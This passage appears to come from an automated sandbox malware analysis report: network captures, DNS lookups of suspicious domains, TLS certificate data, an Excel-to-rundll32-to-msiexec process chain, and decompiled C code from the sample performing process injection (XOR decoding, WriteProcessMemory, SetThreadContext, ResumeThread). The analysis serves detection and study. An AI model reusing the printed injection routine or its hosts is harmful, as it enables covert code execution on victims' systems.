Jan 22, 2021 17:25:14.400774956 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400799990 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400823116 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400840998 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400841951 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400881052 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400898933 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400919914 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400945902 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400955915 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400960922 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.401004076 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.401015043 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.401047945 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.401065111 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.401086092 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.401101112 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.401125908 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.401148081 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.401163101 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.401165009 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.401202917 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.401222944 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.401242018 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.401242971 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.401282072 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.401299953 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.401329994 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.401335955 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.401372910 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.401392937 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.401437044 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.401447058 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.401487112 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.401504040 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.401526928 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.401540995 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.401556969 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.401581049 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.401616096 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:44.867398024 CET	49166	443	192.168.2.22	172.67.209.71
Jan 22, 2021 17:25:44.913862944 CET	443	49166	172.67.209.71	192.168.2.22
Jan 22, 2021 17:25:44.914338112 CET	49166	443	192.168.2.22	172.67.209.71
Jan 22, 2021 17:25:44.950692892 CET	49166	443	192.168.2.22	172.67.209.71
Jan 22, 2021 17:25:44.997513056 CET	443	49166	172.67.209.71	192.168.2.22
Jan 22, 2021 17:25:45.034414053 CET	443	49166	172.67.209.71	192.168.2.22
Jan 22, 2021 17:25:45.034466982 CET	443	49166	172.67.209.71	192.168.2.22
Jan 22, 2021 17:25:45.034514904 CET	49166	443	192.168.2.22	172.67.209.71
Jan 22, 2021 17:25:45.034549952 CET	49166	443	192.168.2.22	172.67.209.71
Jan 22, 2021 17:25:45.042327881 CET	49166	443	192.168.2.22	172.67.209.71
Jan 22, 2021 17:25:45.088696003 CET	443	49166	172.67.209.71	192.168.2.22
Jan 22, 2021 17:25:45.088742018 CET	443	49166	172.67.209.71	192.168.2.22
Jan 22, 2021 17:25:45.088864088 CET	49166	443	192.168.2.22	172.67.209.71
Jan 22, 2021 17:25:45.451143980 CET	49166	443	192.168.2.22	172.67.209.71
Jan 22, 2021 17:25:45.497634888 CET	443	49166	172.67.209.71	192.168.2.22
Jan 22, 2021 17:25:45.937062979 CET	443	49166	172.67.209.71	192.168.2.22
Jan 22, 2021 17:25:45.937122107 CET	443	49166	172.67.209.71	192.168.2.22
Jan 22, 2021 17:25:45.937407970 CET	49166	443	192.168.2.22	172.67.209.71
Jan 22, 2021 17:25:45.952189922 CET	49166	443	192.168.2.22	172.67.209.71
Jan 22, 2021 17:25:45.998584986 CET	443	49166	172.67.209.71	192.168.2.22
Jan 22, 2021 17:25:46.095290899 CET	49167	443	192.168.2.22	104.21.86.32
Jan 22, 2021 17:25:46.135579109 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 17:25:46.135715008 CET	49167	443	192.168.2.22	104.21.86.32
Jan 22, 2021 17:25:46.137850046 CET	49167	443	192.168.2.22	104.21.86.32
Jan 22, 2021 17:25:46.177944899 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 17:25:46.181986094 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 17:25:46.182007074 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 17:25:46.182059050 CET	49167	443	192.168.2.22	104.21.86.32
Jan 22, 2021 17:25:46.182086945 CET	49167	443	192.168.2.22	104.21.86.32
Jan 22, 2021 17:25:46.194804907 CET	49167	443	192.168.2.22	104.21.86.32
Jan 22, 2021 17:25:46.234853029 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 17:25:46.234893084 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 17:25:46.234963894 CET	49167	443	192.168.2.22	104.21.86.32
Jan 22, 2021 17:25:46.246237040 CET	49167	443	192.168.2.22	104.21.86.32
Jan 22, 2021 17:25:46.286441088 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 17:25:47.047974110 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 17:25:47.048053026 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 17:25:47.048363924 CET	49167	443	192.168.2.22	104.21.86.32
Jan 22, 2021 17:25:47.053797960 CET	49167	443	192.168.2.22	104.21.86.32
Jan 22, 2021 17:25:47.093905926 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 17:25:47.182171106 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 17:25:47.229664087 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 17:25:47.229827881 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 17:25:47.231347084 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 17:25:47.277251959 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 17:25:47.286356926 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 17:25:47.286408901 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 17:25:47.286488056 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 17:25:47.286523104 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 17:25:47.302638054 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 17:25:47.348398924 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 17:25:47.349323988 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 17:25:47.349401951 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 17:25:47.367523909 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 17:25:47.413263083 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 17:25:47.832277060 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 17:25:47.832328081 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 17:25:47.832504988 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 17:25:47.838474989 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 17:25:47.884874105 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 17:27:13.416788101 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:27:13.457366943 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:27:13.458997011 CET	49165	443	192.168.2.22	104.21.23.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 22, 2021 17:25:13.462805033 CET	52197	53	192.168.2.22	8.8.8.8
Jan 22, 2021 17:25:13.522892952 CET	53	52197	8.8.8.8	192.168.2.22
Jan 22, 2021 17:25:44.727586985 CET	53099	53	192.168.2.22	8.8.8.8
Jan 22, 2021 17:25:44.788104057 CET	53	53099	8.8.8.8	192.168.2.22
Jan 22, 2021 17:25:44.788981915 CET	53099	53	192.168.2.22	8.8.8.8
Jan 22, 2021 17:25:44.845138073 CET	53	53099	8.8.8.8	192.168.2.22
Jan 22, 2021 17:25:46.033493042 CET	52838	53	192.168.2.22	8.8.8.8
Jan 22, 2021 17:25:46.089943886 CET	53	52838	8.8.8.8	192.168.2.22
Jan 22, 2021 17:25:47.110030890 CET	61200	53	192.168.2.22	8.8.8.8
Jan 22, 2021 17:25:47.177846909 CET	53	61200	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 22, 2021 17:25:13.462805033 CET	192.168.2.22	8.8.8.8	0xa4ce	Standard query (0)	fortnitehecks.com	A (IP address)	IN (0x0001)
Jan 22, 2021 17:25:44.727586985 CET	192.168.2.22	8.8.8.8	0xbab8	Standard query (0)	groceryasian.com	A (IP address)	IN (0x0001)
Jan 22, 2021 17:25:44.788981915 CET	192.168.2.22	8.8.8.8	0xbab8	Standard query (0)	groceryasian.com	A (IP address)	IN (0x0001)
Jan 22, 2021 17:25:46.033493042 CET	192.168.2.22	8.8.8.8	0x287f	Standard query (0)	forteanhub.com	A (IP address)	IN (0x0001)
Jan 22, 2021 17:25:47.110030890 CET	192.168.2.22	8.8.8.8	0x49f6	Standard query (0)	conssapratigdevi.tk	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 22, 2021 17:25:13.522892952 CET	8.8.8.8	192.168.2.22	0xa4ce	No error (0)	fortnitehecks.com	104.21.23.220	A (IP address)	IN (0x0001)
Jan 22, 2021 17:25:13.522892952 CET	8.8.8.8	192.168.2.22	0xa4ce	No error (0)	fortnitehecks.com	172.67.213.245	A (IP address)	IN (0x0001)
Jan 22, 2021 17:25:44.788104057 CET	8.8.8.8	192.168.2.22	0xbab8	No error (0)	groceryasian.com	172.67.209.71	A (IP address)	IN (0x0001)
Jan 22, 2021 17:25:44.788104057 CET	8.8.8.8	192.168.2.22	0xbab8	No error (0)	groceryasian.com	104.21.85.189	A (IP address)	IN (0x0001)
Jan 22, 2021 17:25:44.845138073 CET	8.8.8.8	192.168.2.22	0xbab8	No error (0)	groceryasian.com	172.67.209.71	A (IP address)	IN (0x0001)
Jan 22, 2021 17:25:44.845138073 CET	8.8.8.8	192.168.2.22	0xbab8	No error (0)	groceryasian.com	104.21.85.189	A (IP address)	IN (0x0001)
Jan 22, 2021 17:25:46.089943886 CET	8.8.8.8	192.168.2.22	0x287f	No error (0)	forteanhub.com	104.21.86.32	A (IP address)	IN (0x0001)
Jan 22, 2021 17:25:46.089943886 CET	8.8.8.8	192.168.2.22	0x287f	No error (0)	forteanhub.com	172.67.214.102	A (IP address)	IN (0x0001)
Jan 22, 2021 17:25:47.177846909 CET	8.8.8.8	192.168.2.22	0x49f6	No error (0)	conssapratigdevi.tk	172.67.152.74	A (IP address)	IN (0x0001)
Jan 22, 2021 17:25:47.177846909 CET	8.8.8.8	192.168.2.22	0x49f6	No error (0)	conssapratigdevi.tk	104.21.32.134	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 22, 2021 17:25:13.650782108 CET	104.21.23.220	443	192.168.2.22	49165	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Sun Jan 17 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Mon Jan 17 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 22, 2021 17:25:13.650782108 CET	104.21.23.220	443	192.168.2.22	49165	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 22, 2021 17:25:45.034466982 CET	172.67.209.71	443	192.168.2.22	49166	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Wed Dec 02 01:00:00 CET 2020 Mon Jan 27 13:48:08 CET 2020	Thu Dec 02 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 22, 2021 17:25:45.034466982 CET	172.67.209.71	443	192.168.2.22	49166	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 22, 2021 17:25:46.182007074 CET	104.21.86.32	443	192.168.2.22	49167	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Sun Jan 17 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Mon Jan 17 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 22, 2021 17:25:46.182007074 CET	104.21.86.32	443	192.168.2.22	49167	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 22, 2021 17:25:47.286408901 CET	172.67.152.74	443	192.168.2.22	49168	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Thu Sep 17 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020	Fri Sep 17 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 22, 2021 17:25:47.286408901 CET	172.67.152.74	443	192.168.2.22	49168	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2304 Parent PID: 584

General

Start time:	17:24:40
Start date:	22/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fcc0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2408 Parent PID: 2304

General

Start time:	17:24:44
Start date:	22/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer
Imagebase:	0xff050000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2336 Parent PID: 2408

General

Start time:	17:24:45
Start date:	22/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer
Imagebase:	0xcb0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msiexec.exe PID: 1948 Parent PID: 2336

General

Start time:	17:25:11
Start date:	22/01/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	msiexec.exe
Imagebase:	0xd20000
File size:	73216 bytes
MD5 hash:	4315D6ECAE85024A0567DF2CB253B7B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 2336 Parent PID: 2408 rundll32.exeCOMMON

Executed Functions

Function 6E86AE40, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 372
injectionmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E6E86AE40(void* __eflags) {
				void* _v20;
				void* _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				struct _PROCESS_INFORMATION _v68;
				void* _v72;
				intOrPtr _v110;
				char _v111;
				char _v125;
				signed int _v129;
				char _v130;
				void* _v134;
				char _v135;
				intOrPtr _v139;
				void _v140;
				char _v155;
				char _v179;
				void* _v712;
				char _v896;
				char _v1416;
				void* __ebx;
				void* __edi;
				void* _t76;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t94;
				int _t97;
				void* _t100;
				void* _t104;
				signed int _t107;
				int _t109;
				void* _t111;
				void _t112;
				void* _t119;
				int _t121;
				intOrPtr* _t123;
				int _t126;
				long _t128;
				int _t129;
				int _t136;
				void* _t137;
				signed int _t139;
				signed int _t148;
				void* _t150;
				struct _STARTUPINFOA* _t151;
				long _t152;
				void* _t153;
				CONTEXT* _t155;
				signed int _t157;
				void* _t159;
				signed int _t172;
				void* _t177;
				CHAR* _t178;
				long _t180;
				intOrPtr _t182;
				void* _t184;
				signed int _t185;
				void* _t196;
				void* _t207;
				signed int _t241;

				_t226 = __eflags;
				E6E8645B0(_t76, _t159, _t177, __eflags); // executed
				E6E866C20(_t159, _t177, __eflags);
				E6E866530(_t159, _t177, _t226);
				E6E868660(_t159, _t177, _t226);
				E6E8678D0(_t159, _t177, _t226);
				E6E8666E0(_t159, _t177, _t226);
				_t188 = 0xffffffff;
				if(E6E86D670() == 0) {
					return 0xffffffff;
				}
				E6E87B180();
				_t228 =  *0x6e8837b0;
				if( *0x6e8837b0 == 0) {
					L19:
					E6E86BF50(_t243, 0, E6E869D50(0x638d6cbf));
					ExitProcess(0);
				}
				_t89 = E6E86BF50(_t228, 0, E6E869D50(0x6bae8bdb));
				_t196 = _t196 + 0xc;
				_t188 =  &_v1416;
				 *_t89( *0x6e8837b0,  &_v1416, 0x104);
				_t91 =  *0x6e8837b0; // 0x6e860000
				_t229 = _t91;
				_v32 = _t91;
				if(_t91 == 0) {
					goto L19;
				}
				_t151 =  &_v140;
				E6E878F20(_t151, 0x44);
				_v140 = 0x44;
				_t94 = E6E86D0A0( &_v179, 0x6e880b1b,  &_v179);
				_t178 =  &_v896;
				E6E86C560(_t178, _t94, 0xffffffff);
				E6E86BF50(_t229, 0, 0x1e16041);
				_t196 = _t196 + 0x24;
				_t97 = CreateProcessA(0, _t178, 0, 0, 0, 4, 0, 0, _t151,  &_v68); // executed
				_t230 = _t97 - 1;
				if(_t97 != 1) {
					goto L19;
				}
				_t152 = E6E86A820(_v32);
				E6E86BF50(_t230, 0, 0x8cae838);
				_t196 = _t196 + 0xc;
				_t100 = VirtualAllocEx(_v68.hProcess, 0, _t152, 0x3000, 4); // executed
				_t231 = _t100;
				if(_t100 == 0) {
					goto L19;
				}
				 *0x6e882ca8 = _t100;
				_v24 = _t100;
				E6E87FA60(_t178, _t231,  &_v1416);
				E6E8790E0(_t178);
				E6E87FB20(_t178);
				_t104 = E6E869D80(_v32, _t152); // executed
				_t188 = _t104;
				E6E874660(_t104, _v32);
				E6E869550(_t152, _t177, _v32, _t231, _t188, _v24);
				_t207 = _t196 + 0x1c;
				_t107 = E6E8776C0(_t231);
				_t180 = _t152;
				_v48 = _t107;
				if(_t152 == 0) {
					L8:
					_v28 = 0;
					E6E86BF50(_t234, 0, 0xa48b0f9);
					_t196 = _t207 + 8;
					_t109 = WriteProcessMemory(_v68.hProcess, _v24, _t188, _t180,  &_v28); // executed
					_t235 = _t109 - 1;
					if(_t109 == 1) {
						_t188 = _t180;
						E6E86BF50(_t235, 0, 0x8cae838);
						_t196 = _t196 + 8;
						_t111 = VirtualAllocEx(_v68.hProcess, 0, 0x42, 0x3000, 4); // executed
						_t236 = _t111;
						if(_t111 != 0) {
							_t112 = E6E867DD0(0x12);
							_t153 = _v24;
							_v140 = _t112;
							_v20 = _t111;
							_v139 = _t153;
							_v135 = E6E867DD0(0x15);
							_v134 = _t188;
							_v130 = 0xb8;
							_v129 = _v48;
							E6E86E930( &_v125, E6E87D7E0( &_v28, _t177, 0x6e880962, 0xf,  &_v155), 0xe);
							_t182 = _v32;
							_v111 = 0xe9;
							E6E8622E0(_t236, E6E86CA4E, _t182);
							_t119 = E6E869D50(0x2e6222c1);
							_t184 = _v20;
							_v110 = 0x2470a7e1 - _t182 + _t153 - _t184 + _t119;
							E6E86BF50(_t236, 0, 0xa48b0f9);
							_t196 = _t196 + 0x34;
							_t121 = WriteProcessMemory(_v68.hProcess, _t184,  &_v140, 0x42,  &_v28); // executed
							_t237 = _t121 - 1;
							if(_t121 == 1) {
								_v36 = _t188;
								_t155 =  &_v896;
								E6E878F20(_t155, 0x2cc);
								_v896 = 0x10001;
								_t123 = E6E86BF50(_t237, 0, 0x4bbc7e4);
								_t188 =  *_t123(_v68.hThread, _t155);
								E6E86BF50(_t237, 0, 0xd1a4de8);
								_t196 = _t196 + 0x18;
								_t126 = VirtualProtectEx(_v68.hProcess, _t184, 0x42, 0x10,  &_v28); // executed
								if(_t126 == 1) {
									_t239 = _t188 - 1;
									_t172 = 1;
									_v712 = _t184;
									if(_t188 == 1) {
										E6E86BF50(_t239, 0, E6E869D50(0x60ce8748));
										_t196 = _t196 + 0xc;
										_t136 = SetThreadContext(_v68.hThread, _t155); // executed
										_t68 = _t136 != 1;
										_t241 = _t68;
										_t172 = 0 | _t68;
									}
									_t185 = _t172;
									_t188 = E6E86BF50(_t241, 0, 0xd1a4de8);
									_t128 = E6E869D50(0x647400ec);
									_t196 = _t196 + 0xc;
									_t129 = VirtualProtectEx(_v68.hProcess, _v24, _v36, _t128,  &_v28); // executed
									if(_t129 == 1) {
										_t243 = _t185;
										if(_t185 == 0) {
											E6E86BF50(__eflags, 0, E6E869D50(0x6f5727e8));
											_t196 = _t196 + 0xc;
											_push(_v68.hThread);
										} else {
											E6E86BF50(_t243, 0, 0x68b1574);
											_t196 = _t196 + 8;
											_push(0);
											_push(0);
											_push(0);
											_push(_v20);
											_push(0);
											_push(0);
											_push(_v68);
										}
										ResumeThread(); // executed
									}
								}
							}
						}
					}
					goto L19;
				} else {
					_t157 = _v48;
					_t137 = 0;
					_v36 = _t180;
					_v72 = _t188;
					do {
						_v20 = _t137;
						 *(_t188 + _t137) =  *(_t188 + _t137) ^ _t157;
						_t139 = _t157 << 8;
						_v52 = _t139;
						_v44 =  !_t139;
						_v40 = E6E863750(0,  !_t139, 0x9b6b004f);
						_v40 = E6E862DC0(0, E6E869D50(0xff1f00e3) &  !(_t157 >> 0x18), _t157 >> 0x00000018 & 0xffffffb0) ^ (_v52 & 0x6494ff00 | _v40);
						_t180 = _v36;
						_v44 = E6E8620A0(0, E6E862DC0(0, _v44,  !(_t157 >> 0x18)), 0xffffffff);
						_t148 = E6E869D50(0xff1f00e3);
						E6E862DC0(0, _v52, _t157 >> 0x18);
						_t150 = E6E8622E0(0, 0, 1);
						_t207 = _t207 + 0x38;
						_v20 = _v20 - _t150;
						_t157 = (_t148 | 0x6494ffb0) & _v44 | _v40;
						_t188 = _v72;
						_t137 = _v20;
						_t234 = _t137 - _t180;
					} while (_t137 != _t180);
					goto L8;
				}
			}

0x6e86ae40
0x6e86ae4c
0x6e86ae51
0x6e86ae56
0x6e86ae5b
0x6e86ae60
0x6e86ae65
0x6e86ae6a
0x6e86ae76
0x6e86b2de
0x6e86b2de
0x6e86ae7c
0x6e86ae81
0x6e86ae88
0x6e86b2b4
0x6e86b2c4
0x6e86b2ce
0x6e86b2ce
0x6e86ae9e
0x6e86aea3
0x6e86aea6
0x6e86aeb8
0x6e86aeba
0x6e86aebf
0x6e86aec1
0x6e86aec4
0x00000000
0x00000000
0x6e86aeca
0x6e86aed3
0x6e86aee1
0x6e86aef1
0x6e86aef9
0x6e86af03
0x6e86af12
0x6e86af17
0x6e86af2e
0x6e86af30
0x6e86af33
0x00000000
0x00000000
0x6e86af44
0x6e86af4d
0x6e86af52
0x6e86af62
0x6e86af64
0x6e86af66
0x00000000
0x00000000
0x6e86af6c
0x6e86af74
0x6e86af77
0x6e86af7d
0x6e86af87
0x6e86af91
0x6e86af99
0x6e86af9d
0x6e86afa9
0x6e86afae
0x6e86afb1
0x6e86afb8
0x6e86afba
0x6e86afbd
0x6e86b08d
0x6e86b08d
0x6e86b09b
0x6e86b0a0
0x6e86b0af
0x6e86b0b1
0x6e86b0b4
0x6e86b0ba
0x6e86b0c3
0x6e86b0c8
0x6e86b0d9
0x6e86b0db
0x6e86b0dd
0x6e86b0e7
0x6e86b0ef
0x6e86b0f2
0x6e86b0f8
0x6e86b0fb
0x6e86b10b
0x6e86b114
0x6e86b11a
0x6e86b11e
0x6e86b13e
0x6e86b146
0x6e86b149
0x6e86b153
0x6e86b160
0x6e86b176
0x6e86b17d
0x6e86b187
0x6e86b18c
0x6e86b19d
0x6e86b19f
0x6e86b1a2
0x6e86b1a8
0x6e86b1b0
0x6e86b1b7
0x6e86b1bf
0x6e86b1d0
0x6e86b1de
0x6e86b1e7
0x6e86b1ec
0x6e86b1fb
0x6e86b200
0x6e86b206
0x6e86b209
0x6e86b20e
0x6e86b214
0x6e86b226
0x6e86b22b
0x6e86b232
0x6e86b239
0x6e86b239
0x6e86b239
0x6e86b239
0x6e86b23c
0x6e86b250
0x6e86b257
0x6e86b25c
0x6e86b26b
0x6e86b270
0x6e86b272
0x6e86b274
0x6e86b2a7
0x6e86b2ac
0x6e86b2af
0x6e86b276
0x6e86b27d
0x6e86b282
0x6e86b285
0x6e86b287
0x6e86b289
0x6e86b28b
0x6e86b28e
0x6e86b290
0x6e86b292
0x6e86b292
0x6e86b2b2
0x6e86b2b2
0x6e86b270
0x6e86b200
0x6e86b1a2
0x6e86b0dd
0x00000000
0x6e86afc3
0x6e86afc3
0x6e86afc6
0x6e86afc8
0x6e86afcb
0x6e86afd0
0x6e86afd0
0x6e86afd3
0x6e86afdd
0x6e86afe0
